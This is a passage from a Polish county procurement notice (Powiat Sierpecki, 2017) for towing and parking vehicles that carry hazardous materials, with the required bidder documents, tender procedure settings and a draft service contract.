4) Oświadczenie o  dysponowaniu  parkingiem spełniającym  wymogi dla przechowywania samochodów nie przewożących materiałów niebezpiecznych lub samochodów przewożących materiały niebezpieczne  Załącznik Nr 1c;
5) Wykaz zasobów ludzkich, którym Wykonawca powierza realizację  zamówienia  Załącznik Nr 1d do SIWZ;
6) Oświadczenie o spełnianiu warunków udziału w postępowaniu  Załącznik Nr 2 do SIWZ;
7) Oświadczenie o rocznym obrocie Wykonawcy w obszarze objętym zamówieniem za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeśli okres jest krótszy  za ten okres  Załącznik Nr 2a do SIWZ;
8) Oświadczenie o braku podstaw do wykluczenia z postępowania  Załącznik Nr 3 do SIWZ;
9) Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej  Załącznik Nr 3a do SIWZ;
10) Oświadczenie o braku orzeczenia wobec Wykonawcy tytułem środka zapobiegawczego zakazu ubiegania się zamówienia publiczne  Załącznik Nr  3b do SIWZ;
11) Oświadczenie o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na kare ograniczenia wolności lub grzywny w zakresie określonym przez Zamawiającego na podstawie art. 24 ust. 4 pkt 5 i 6 Pzp  Załącznik Nr 3c do SIWZ;
12) Oświadczenie o braku wydania wobec Wykonawcy ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez Zamawiającego na podstawie art. 24 ust. 5 pkt 7 Pzp  Załącznik Nr 3d do SIWZ;
13) Oświadczenie o podwykonawcach  Załącznik Nr 4 do SIWZ;
14) Zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia  Załącznik Nr 5 do SIWZ;
15) Projekty umów  Załączniki Nr 6 do SIWZ;
16) )Aktualne zezwolenie na wykonywanie zawodu przewoźnika drogowego w zakresie rzeczy - zgodnie z art.5 ust.1 ustawy z dnia 6 września 2001 r. o transporcie drogowym  (Dz.U. z 2016  r poz.1907 z późn. zm.);
17) Aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub równoważne;
18) Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
19) Kopia polisy lub innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej;
20) Pełnomocnictwo (jeżeli występuje).
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>zdolność techniczna</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

                Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: 
                <br />

                Data: 18/04/2017 godzina: 08:00<br />

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">Załącznik Nr 6 do SIWZ

Umowa  - projekt


 w dniu ...................... pomiędzy Powiatem Sierpeckim, ul. Świętokrzyska 2a, 09-200 Sierpc, NIP 7761676252
reprezentowanym przez:
Jana Laskowskiego  Starostę Sierpeckiego
Juliusza Gorzkosia  Wicestarostę Sierpeckiego  z kontrasygnatą Skarbnika Powiatu  Krzysztofa Sobieckiego
zwanym dalej Zamawiającym

a  
........................................................................................................
                                  ( nazwa i siedziba Wykonawcy) 

reprezentowanym przez: 

1..........................................................................................................

2..........................................................................................................
zwanym dalej Wykonawcą
została zawarta umowa następującej treści:


§ 1.
1. Przedmiotem niniejszej umowy zawartej w wyniku rozstrzygnięcia postępowania o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego na podstawie art. 39 ustawy z dnia 29.01.2004 r. - Prawo zamówień publicznych (Dz.U. z 2015 r. poz. 2164 z późn. zm.)  jest świadczenie w latach 2017-2020 usługi usunięcia z dróg powiatu sierpeckiego oraz parkowania pojazdów, o których mowa w art. 130a ust. 1 lub 2 ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (Dz.U. z 2017 r. poz. 128)  przewożących materiały niebezpieczne.
2.Definicję drogi zawiera art. 2 ustawy Prawo o ruchu drogowym:
droga - wydzielony pas terenu składający się z jezdni, pobocza, chodnika, drogi dla pieszych lub drogi dla rowerów, łącznie z torowiskiem pojazdów szynowych znajdującym się w obrębie tego pasa, przeznaczony do ruchu lub postoju pojazdów, ruchu pieszych, jazdy wierzchem lub pędzenia zwierząt.

3. Od Wykonawcy usługi wymaga się, aby:
1) Dysponował odpowiednio wyposażonymi i oznakowanymi pojazdami przeznaczonymi do usuwania i przemieszczania pojazdów przewożących materiały niebezpieczne;
2) Wykonywał niezwłocznie i starannie każdą dyspozycję usunięcia pojazdu. 
3) Umieszczał usunięty pojazd na parkingu położonym na terenie powiatu sierpeckiego, zabezpieczonym przed dostępem osób trzecich, spełniającym warunki podane w Rozporządzeniu Ministra Spraw Wewnętrznych z dnia 13.11.2012 r. w sprawie warunków technicznych parkingów, na które są usuwane pojazdy przewożące materiały niebezpieczne (Dz.U. z 2012 r. poz. 1293). Na tym parkingu są wyznaczone   co najmniej dwa stanowiska postojowe przeznaczone dla usuniętych pojazdów przewożących towary niebezpieczne, z których przynajmniej jedno powinno być przelotowe i mieć wymiary co najmniej 3,5 m x 20 m oraz    miejsce przeładunku o wymiarach co najmniej 30 m x 20 m, umożliwiające przeładunek towarów niebezpiecznych lub dokonanie innych czynności zabezpieczających.

Uwaga! Miejsca przeładunku można nie wyznaczać, jeżeli co najmniej jedno stanowisko postojowe ma wymiary umożliwiające przeładunek towaru niebezpiecznego do innego pojazdu lub dokonanie innych czynności zabezpieczających, w tym również z użyciem urządzeń służących do przenoszenia ładunków.

Stanowisko postojowe oraz miejsce przeładunku  nie może być usytuowane w odległości mniejszej niż:
a) 30 m od stanowisk postojowych dla innych pojazdów, urządzeń inżynieryjnych niezwiązanych z parkingiem, granicy sąsiedniej działki oraz budynków i obiektów nieprzeznaczonych na pobyt ludzi,                                      .     ,
b) 40 m od lasu o powierzchni powyżej 3 ha, gazociągów wysokiego ciśnienia i torów kolejowych,
c) 300 m od budynków mieszkalnych lub innych obiektów przeznaczonych na pobyt ludzi, ujęć wody, studni publicznych lub urządzeń służących do magazynowania i uzdatniania wody,
d) 15 m od obiektów, o których mowa w lit. a, w przypadku zastosowania wolno stojącej ściany oddzielenia przeciwpożarowego o klasie odporności ogniowej co najmniej REI 120 i wysokości co najmniej 4 m,
e) 150 m od budynków mieszkalnych lub innych obiektów przeznaczonych na pobyt ludzi, ujęć wody, studni publicznych lub urządzeń służących do magazynowania i uzdatniania wody, w przypadku zastosowania wolno stojącej ściany oddzielenia przeciwpożarowego o klasie odporności ogniowej co najmniej REI 120 i wysokości co najmniej 4 m.
Stanowisko postojowe   nie może być usytuowane w zagłębieniach terenu, na terenie podmokłym oraz w odległości mniejszej niż 10 m od rowów, studzienek i urządzeń melioracyjnych.
Stanowisko powinno  mieć odrębny, szczelny system odwadniania, zaopatrzony w urządzenia do zbierania i neutralizacji wycieków materiałów niebezpiecznych.
Nawierzchnia stanowiska postojowego oraz miejsca przeładunku powinna być utwardzona, nienasiąkliwa oraz zapobiegająca przenikaniu materiałów niebezpiecznych do gruntu, urządzeń wodnych i wód.  Ukształtowanie nawierzchni stanowiska postojowego oraz miejsca przeładunku powinno uniemożliwiać rozprzestrzenianie się ewentualnego rozlewiska materiałów niebezpiecznych poza terenem stanowiska.
Do stanowiska postojowego oraz miejsca przeładunku będzie zapewniony dojazd o parametrach technicznych określonych w przepisach dotyczących wymagań w zakresie dróg pożarowych.
Parking wyposażony jest w  odpowiednie znaki drogowe oraz znaki informacyjno-ostrzegawcze, sprzęt przeciwpożarowy, w szczególności: a) gaśnicę przewoźną 25 kg proszkową lub CO2, dwie gaśnice proszkowe 6 kg, 2 koce gaśnicze,  skrzynię zawierającą co najmniej l m3 piasku,  substancje i materiały neutralizujące i pochłaniające;  dostęp do bieżącej wody.

Uwaga! Parking, mający więcej niż 4 stanowiska postojowe dla pojazdów przewożących towary niebezpieczne, powinien mieć źródło wody o wydajności co najmniej 10 dm3 /s lub zapas wody w ilości 100 m3 w przeciwpożarowym zbiorniku wodnym, zgodnie z wymogami określonymi w przepisach dotyczących wymagań w zakresie przeciwpożarowego zaopatrzenia w wodę.

4) Prowadził ewidencję pojazdów usuniętych z dróg, przyjętych na parking i wydanych z parkingu.

3. Wykonawca realizuje usługę siłami własnymi zgodnie z zasadami rzetelnej wiedzy technicznej, etyką zawodową oraz ustalonymi zwyczajami.

4. Źródłem finansowania przedmiotu umowy jest budżet powiatu sierpeckiego na lata 2017-2020.
§ 2.

Termin realizacji umowy: od  dnia podpisania umowy do 31.12.2020 r.
§ 3.
Wykonawca zobowiązuje się:
1) Wykonać każdą dyspozycję usunięcia pojazdu z drogi (całodobowo przez 7 dni w tygodniu) wydaną przez uprawniony organ w trybie art. 130a ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz.U. z 2017 r. poz. 128).
a. Decyzję o przemieszczeniu lub usunięciu pojazdu z drogi podejmują uprawnione podmioty, określone przepisami art. 130a ustawy Prawo o ruchu drogowym oraz rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 16.10.2007 r. w sprawie usuwania pojazdów (Dz. U. z 2007 r., Nr 197, poz. 1377 z późn. zm.).
b. Dyspozycję wydaje w formie pisemnej funkcjonariusz lub pracownik uprawnionego podmiotu, po osobistym upewnieniu się, że istnieją przesłanki do usunięcia pojazdu.
c. Dyspozycję można wydać ustnie, w tym za pośrednictwem środków łączności. W takim przypadku dyspozycja wymaga niezwłocznego potwierdzenia w formie pisemnej.
d. Wzór dyspozycji określa załącznik nr 1 do ww. rozporządzenia.
2) Przystąpić do usuwania pojazdu w czasie nieprzekraczającym:
a. 30 minut - na terenie miasta Sierpca,
b. 60 minut - na terenie pozostałych gmin powiatu sierpeckiego.
3) Powiadamiać niezwłocznie o usunięciu pojazdu z drogi Wydział Komunikacji i Transportu Starostwa Powiatowego  w Sierpcu i przekazywać kopię dyspozycji usunięcia.
4) Odstąpić od usunięcia pojazdu, na polecenie podmiotu, który wydał dyspozycje, w przypadku ustania przyczyny jego usunięcia.
5) Przechować usunięty pojazd w depozycie na parkingu strzeżonym wskazanym w ofercie, do chwili okazania przez właściciela dyspozycji wydania po uiszczeniu w Wydziale Komunikacji i Transportu Starostwa Powiatowego w Sierpcu opłaty za usunięcie pojazdu 
a. Podstawę do odbioru pojazdu z parkingu stanowi zezwolenie, które jest drukiem ścisłego zarachowania, a jego wzór określa załącznik nr 2 do ww. rozporządzenia.
b. Pojazd z parkingu odbiera osoba wskazana w zezwoleniu lub właściciel (posiadacz) wskazany w dowodzie rejestracyjnym (pozwoleniu czasowym) pojazdu.
c. W przypadku nieodebrania pojazdu z parkingu w terminie 3 miesięcy, licząc od dnia usunięcia, Wykonawca zobowiązany jest powiadomić o tym, nie później niż trzeciego dnia od dnia upływu tego terminu, Starostę Sierpeckiego oraz podmiot, który wydał dyspozycję usunięcia.
6) W przypadku pojazdów usuniętych w soboty, niedziele i święta oraz po godzinach pracy Starostwa Powiatowego w Sierpcu (tj. po godz. 15.00), opłaty za usunięcie i przechowywanie pojazdu pobierane będą przez Wykonawcę zgodnie z opłatami określonymi uchwałą Rady Powiatu w Sierpcu ogłoszoną w Dzienniku Urzędowym Województwa Mazowieckiego. Wykonawca zobowiązany jest do przekazania pobranej opłaty w imieniu wpłacającego na rachunek bankowy Zamawiającego  Nr 21 9015 0001 2005 0000 0778 0003 najpóźniej w następnym dniu roboczym.
§ 4.
1. Do kierowania pracami z ramienia Wykonawcy wyznacza się ............................... dostępny pod numerem telefonu................................
2. Osobą uprawnioną do kontaktów z Zamawiającym w sprawach wykonania niniejszej umowy jest ........................... nr tel. ..................................
§ 5.
1. Wykonawca zobowiązuje się wykonać przedmiot umowy stosując przy jego wykonywaniu przepisy prawa regulujące przedmiotową problematykę.
2. Wykonawca podczas realizacji przedmiotu umowy ponosi pełną odpowiedzialności za szkody wyrządzone osobom trzecim.
3. Zamawiający nie ponosi odpowiedzialności cywilnoprawnej za uszkodzenie lub utratę pojazdu usuwanego z drogi.
4. Wykonawca oświadcza, że posiada opłaconą polisę potwierdzającą, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
§ 6.
Za swe usługi Wykonawca otrzyma wynagrodzenie za usunięcie pojazdu, jego przechowywanie lub zwrot kosztów za odstąpienie od rozpoczętej usługi usuwania pojazdu, jeżeli przed wydaniem dyspozycji usunięcia pojazdu lub w trakcie usuwania ustaną przyczyny jego usunięcia zgodnie z ofertą z dnia...............................

Usługa usuwania pojazdów
Lp.
Rodzaj pojazdu
Opłata netto
VAT
Opłata brutto
1
Pojazd przewożący materiały niebezpieczne





Usługa przechowywania pojazdów na parkingu strzeżonym
Lp.
Rodzaj pojazdu
Opłata netto
za dobę
VAT
Opłata brutto
za dobę
1
Pojazd przewożący materiały niebezpieczne






Koszt odstąpienia od rozpoczętej usługi usuwania pojazdów
Lp.
Rodzaj pojazdu
Koszt netto

VAT
Koszt brutto

1
Pojazd przewożący materiały niebezpieczne




§ 7.
1. Strony postanawiają, że:
1) Rozliczenie przedmiotu umowy nastąpi każdorazowo na podstawie przedstawionych w ofercie Wykonawcy cen jednostkowych usługi za usunięcie pojazdu oraz faktycznych dni parkowania pojazdu ewentualnie w wyniku poniesionego przez Wykonawcę kosztu odstąpienia od usunięcia pojazdu.
2) Ustala się, że opłata za całą dobę przechowywania pojazdu na parkingu strzeżonym dotyczy wyłącznie pierwszej doby niezależnie od liczby godzin przechowywania  pojazdu w przedziale 24 godzin. Przy naliczaniu opłaty za każdą kolejną dobę obowiązuje naliczanie zgodne z kolejnymi datami.

2. Termin zapłaty faktur wystawionych przez Wykonawcę będzie wynosić 14 dni od daty ich doręczenia wraz z wykazem usuniętych pojazdów.

3. Fakturę Wykonawca powinien adresować następująco: 
Nabywca: Powiat Sierpecki, NIP 7761676252, ul. Świętokrzyska 2a, 09-200 Sierpc.
Odbiorca: Starostwo Powiatowe, ul. Świętokrzyska 2a, 09-200 Sierpc.
§ 8.
Strony zastrzegają sobie prawo do odszkodowania  do wysokości rzeczywiście poniesionej szkody.
§ 9.
1. Oprócz przypadków określonych w przepisach Kodeksu cywilnego Zamawiającemu przysługuje prawo odstąpienia od umowy w razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy; odstąpienie od umowy w tym przypadku może nastąpić w terminie 30 dni od powzięcia wiadomości o tych okolicznościach, zaś Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
2. Wykonawcy przysługuje prawo odstąpienia od umowy w szczególności jeżeli Zamawiający zawiadomi Wykonawcę, iż wobec zaistnienia uprzednio nieprzewidzianych okoliczności nie będzie mógł spełnić swoich zobowiązań umownych wobec Wykonawcy - odstąpienie od umowy w tym przypadku może nastąpić w trybie i na zasadach określonych w ust.1.
3. W przypadku wystąpienia zwłoki w wykonaniu przez Wykonawcę zobowiązań przyjętych niniejszą umową Zamawiający może zlecić ich wykonanie wybranemu przez siebie innemu podmiotowi na koszt Wykonawcy, zachowując przy tym prawo do roszczeń i naprawienia szkody powstałej w wyniku zwłoki.
4. Zamawiający może odstąpić od umowy ze skutkiem natychmiastowym w przypadku, gdy Wykonawca powierzy wykonywanie przedmiotu umowy innemu podmiotowi niż Wykonawca.
§ 10.
1. Zamawiający zastrzega sobie prawo kontroli w zakresie prawidłowości wykonywania usług stanowiących przedmiot niniejszej umowy.
2. Zamawiający wymaga, by kierowcy wyznaczeni przez Wykonawce do realizacji przedmiotu umowy oraz osoby obsługujące parking były zatrudnione na podstawie umowy o pracę w rozumieniu art. 22 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (t.j. Dz. U. z 2014 r. poz. 1502 z późn. zm.) lub umowy równoważnej dla Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej i zatrudniającej zgodnie ze swoim prawem pracy. Obowiązek wykazania, że dana umowy jest równoważna z umową o pracę w rozumieniu art. 22 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy spoczywa na Wykonawcy. Zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec Wykonawcy odnośnie spełniania przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę kierowców oraz osób prowadzących parking. Zamawiający uprawniony jest w szczególności do:
a) żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww.  wymogów i dokonywania ich oceny,
b) żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów,
c) przeprowadzania kontroli na miejscu wykonywania świadczenia.
d) W trakcie realizacji zamówienia  na każde wezwanie Zamawiającego w wyznaczonym w tym wezwaniu terminie Wykonawca przedłoży Zamawiającemu wskazane poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób zatrudnionych jako kierowcy i osoby prowadzące parking:
 oświadczenie Wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności, których dotyczy wezwanie Zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy;
 zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez wykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy; 
 poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych.
3. Z tytułu niespełnienia przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 1 czynności Zamawiający przewiduje sankcję w postaci obowiązku zapłaty przez Wykonawcę kary umownej w wysokości 3000 zł od osoby. Niezłożenie przez Wykonawcę w wyznaczonym przez zamawiającego terminie żądanych przez Zamawiającego dowodów w celu potwierdzenia spełnienia przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę traktowane będzie Jako niespełnienie przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę kierowców i wskazanej osoby do oprowadzenia parkingu.
4. W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez Wykonawcę lub podwykonawcę, Zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy lub jej zagraniczny odpowiednik.
§ 11.
1. Niedopuszczalna jest taka zmiana niniejszej umowy oraz wprowadzenie do niej takich postanowień, które zmieniłyby treść oferty, na podstawie której dokonano wyboru Wykonawcy. Nie dotyczy to jednak sytuacji, gdy konieczność wprowadzenia takich zmian wyniknie w rezultacie okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy lub zmiany te są korzystne dla Zamawiającego.
2. W związku z ust.1 zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.
§ 12.
W sprawach nieuregulowanych w niniejszej umowie będą miały zastosowanie przepisy ustawy Prawo zamówień publicznych, ustawy Prawo o ruchu drogowym, właściwe przepisy Kodeksu cywilnego, zaś w sprawach procesowych przepisy Kodeksu postępowania cywilnego oraz postanowienia Specyfikacji Istotnych Warunków Zamówienia.
§ 13.
1. W przypadku powstania sporu w związku z niniejszą umową strony dążyć będą do ugodowego rozstrzygnięcia sporu, tj. w drodze negocjacji i porozumienia.
2. Wszelkie spory, mogące wyniknąć z tytułu niniejszej umowy, będą rozstrzygane przez sąd właściwy miejscowo dla siedziby Zamawiającego.
§ 14.
Umowa została sporządzona w 4 jednobrzmiących egzemplarzach, po jednym Wykonawcy i 3 egzemplarzach dla Zamawiającego.


W załączeniu: oferta z dnia................. i SIWZ.
Zamawiający	Wykonawca















</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Niedopuszczalna jest taka zmiana niniejszej umowy oraz wprowadzenie do niej takich postanowień, które zmieniłyby treść oferty, na podstawie której dokonano wyboru Wykonawcy. Nie dotyczy to jednak sytuacji, gdy konieczność wprowadzenia takich zmian wyniknie w rezultacie okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy lub zmiany te są korzystne dla Zamawiającego.
2. W związku z ust.1 zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 18/04/2017, godzina: 08:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              oferta w języku polskim<br /><b>IV.6.3) Termin związania ofertą: </b>
